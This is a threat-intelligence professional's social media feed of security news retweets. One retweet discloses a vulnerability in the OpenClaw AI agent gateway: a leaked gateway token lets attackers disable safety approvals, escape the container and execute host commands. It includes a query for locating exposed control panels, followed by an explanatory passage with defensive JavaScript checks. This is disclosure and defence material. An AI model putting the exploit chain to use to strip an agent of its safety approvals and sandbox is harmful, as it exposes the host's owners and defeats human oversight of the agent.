Calwarez
@calwarez
144 posts

Director for Malicious Infrastructure Discovery @ Recorded Future | Views my own
Joined November 2022
375 Following, 188 Followers
Calwarez retweeted
Calwarez (@calwarez):
Threat actors are increasingly abusing Legitimate Internet Services (LIS) like Cloudflare, Google Drive, and Telegram to hide in plain sight. It’s a structural challenge for every network defender. 5/6
Calwarez (@calwarez):
🧵 ICYMI: We just dropped our 2025 Malicious Infrastructure Review! Some of the highlights below👇 #Infosec #CyberThreats 1/6
Calwarez retweeted
Modat (@modat_magnify):
CVE-2026-25253 ⚠️ OpenClaw (Moltbot / Clawdbot) – 1-Click RCE via Token Exfiltration

A high-severity vulnerability (CVSS 8.8) has been disclosed in OpenClaw allowing remote code execution with a single click.

The flaw is a logic issue where the Control UI blindly trusts a gatewayUrl supplied via query string and auto-connects over WebSocket, leaking the stored gateway token to attacker-controlled infrastructure.

By abusing cross-site WebSocket hijacking and privileged operator scopes, attackers can disable safety approvals, escape the container, and execute arbitrary commands directly on the host even when the gateway is bound to localhost only.

Modat previously identified exposed Clawdbot/Moltbot control panels, with numbers now even higher. You can read the full blog here: modat.io/post/moltbot-u…

Fixed in: v2026.1.29

Action: Patch immediately and rotate gateway tokens.

Modat Magnify Query:
web.title~"Clawdbot Control" OR web.title~"OpenClaw Control" OR web.title~"Moltbot Control"

The platform: magnify.modat.io

#threatintel #vulnerability #CVE202625253 #OpenClaw #Moltbot #Clawdbot #RCE #AIsecurity #infosec #ModatMagnify
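The post above describes two distinct weaknesses: a Control UI that auto-connects to whatever gatewayUrl arrives in the query string (so the stored token is sent wherever the link says), and a gateway that relies on a localhost bind instead of checking the Origin of WebSocket upgrade requests, which leaves it open to cross-site WebSocket hijacking from the victim's own browser. The following is an added illustration of both checks, written for this page; it is not OpenClaw's code, and the default gateway address, port, allowlists and function names are assumptions.

```javascript
// Added illustration, not OpenClaw's code. Shows the vulnerable pattern the
// post describes next to a hardened version, plus the server-side Origin check
// that a localhost-only bind does not replace. Port and allowlists are assumed.

const DEFAULT_GATEWAY = "ws://127.0.0.1:18789"; // assumed local default, not OpenClaw's

// Vulnerable pattern: the query-string value is used as-is, so a crafted link
// such as ?gatewayUrl=wss://attacker.example/ws makes the UI open a socket to
// the attacker and send the stored token on connect.
function vulnerableGatewayUrl(search) {
  const params = new URLSearchParams(search);
  return params.get("gatewayUrl") || DEFAULT_GATEWAY;
}

// Hardened pattern: only a ws:/wss: URL whose host is on an allowlist is
// accepted for auto-connect. Anything else yields null, which the UI should
// treat as "do not connect, do not send the token, ask the operator".
function safeGatewayUrl(search, allowedHosts = ["localhost", "127.0.0.1", "[::1]"]) {
  const params = new URLSearchParams(search);
  const candidate = params.get("gatewayUrl");
  if (candidate === null) return DEFAULT_GATEWAY;

  let url;
  try {
    url = new URL(candidate); // throws on malformed input
  } catch {
    return null;
  }
  if (url.protocol !== "ws:" && url.protocol !== "wss:") return null;
  if (url.username || url.password) return null; // no embedded credentials
  if (!allowedHosts.includes(url.hostname)) return null;
  return url.href;
}

// Server side: binding to localhost does not stop cross-site WebSocket
// hijacking, because the victim's browser on the same machine can open the
// socket. The gateway must compare the upgrade request's Origin header with
// the origins the Control UI is actually served from; a missing or malformed
// Origin is treated as untrusted rather than waved through.
function isAllowedWebSocketOrigin(originHeader, allowedOrigins) {
  if (typeof originHeader !== "string") return false;
  let origin;
  try {
    origin = new URL(originHeader).origin;
  } catch {
    return false;
  }
  return allowedOrigins.includes(origin);
}
```

The allowlist approach is deliberate: trying to enumerate "bad" hosts would miss attacker-controlled DNS names, and accepting any ws:/wss: URL still leaks the token. Rotating existing gateway tokens, as the post recommends, is still required after patching, since any token already exfiltrated remains valid until replaced.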
Calwarez retweeted
Modat (@modat_magnify):
New Modat Magnify updates are live.
• Time-based filtering
• Unified IP detail view
• Certificate validity filtering (expired, not yet valid, abnormal lifetimes)
• CN wildcard & partial matching
• Issuer Alternative Name (IAN) search
• Empty field search with field=""
• TLS version filtering
• Banner hex search
• New Tags: VPN and PQC over SSH

Built for faster, more precise infrastructure investigations.

Explore the new features inside the platform: magnify.modat.io
Calwarez retweeted
Squiblydoo (@SquiblydooBlog):
Use YARA for threat hunting? .@theidr0p created a tool for automated YARA rule creation based on the Cert Graveyard. Automatically checks for updates to the database and generates rules. The art is theirs. Amazing. See link in thread for details
Calwarez retweeted
Squiblydoo (@SquiblydooBlog):
From 2020-2024, I tracked the SolarMarker malware, and in 2024, monitored a self-infection for months to learn their actions-on-objectives: on-device fraud. I didn't publish the details of my months-long investigation until now. Check the link in the attached comment.
Calwarez retweeted
FBI Los Angeles (@FBILosAngeles):
A Ukrainian national has been federally charged with participating in dozens of cyberattacks and computer intrusions against critical infrastructure and other victims around the world, in support of Russia's geopolitical interests, the Justice Department announced today.

The two indictments against Victoria Eduardovna Dubranova, 33, a.k.a. "Vika," a.k.a. "Tory," a.k.a. "SovaSonya," were unsealed today in United States District Court in Los Angeles. Dubranova was extradited to the United States earlier this year on an indictment charging her for her actions supporting CyberArmyofRussia_Reborn (CARR). Dubranova was arraigned today on a second indictment charging her for her actions supporting NoName057(16) (NoName). Dubranova has pleaded not guilty in both cases. Dubranova pleaded not guilty today at her arraignment and a February 3, 2026 trial date was scheduled in that case.

As described in the indictments, the Russian government backed CARR and NoName by providing, among other things, financial support. CARR used this financial support to access various cybercriminal services, including subscriptions to distributed denial of service-for-hire services. NoName was a state-sanctioned project administered in part by an information technology organization established by order of the President of Russia in October 2018 that developed, along with other co-conspirators, NoName's proprietary distributed denial of service (DDoS) program.

Details: justice.gov/usao-cdca/pr/j…
Calwarez retweeted
Modat (@modat_magnify):
Cyber Monday Deal

Get 6 months of Modat Magnify Pro for just €5 total (save €355). Use code: MODAT2025CYBERMONDAY

Try the platform. Run advanced queries. Find what others miss.

magnify.modat.io

#CyberMonday #Cybersecurity #OSINT
Calwarez retweeted
Lawrence_Sec (@Lawrence_Sec):
1/ United States, Australia, and United Kingdom sanction Russian threat activity enabler Media Land (Yalishanda) and follow up on recent designations targeting Aeza. ofac.treasury.gov/recent-actions…
Calwarez retweeted
Lawrence_Sec (@Lawrence_Sec):
1/ [UPDATE] As of November 10, 2025, metaspinner net GmbH has provided substantial evidence confirming Insikt Group’s original assessment that their identity was unlawfully and fraudulently used in the registration of #AS209800.
Quoting Lawrence_Sec (@Lawrence_Sec):
> 1/ New report from myself and @_whoisnt : "Malicious Infrastructure Finds Stability with aurologic GmbH." We uncover how German ISP aurologic GmbH has become a central nexus for high-risk hosting networks, sustaining large concentrations of malicious infrastructure.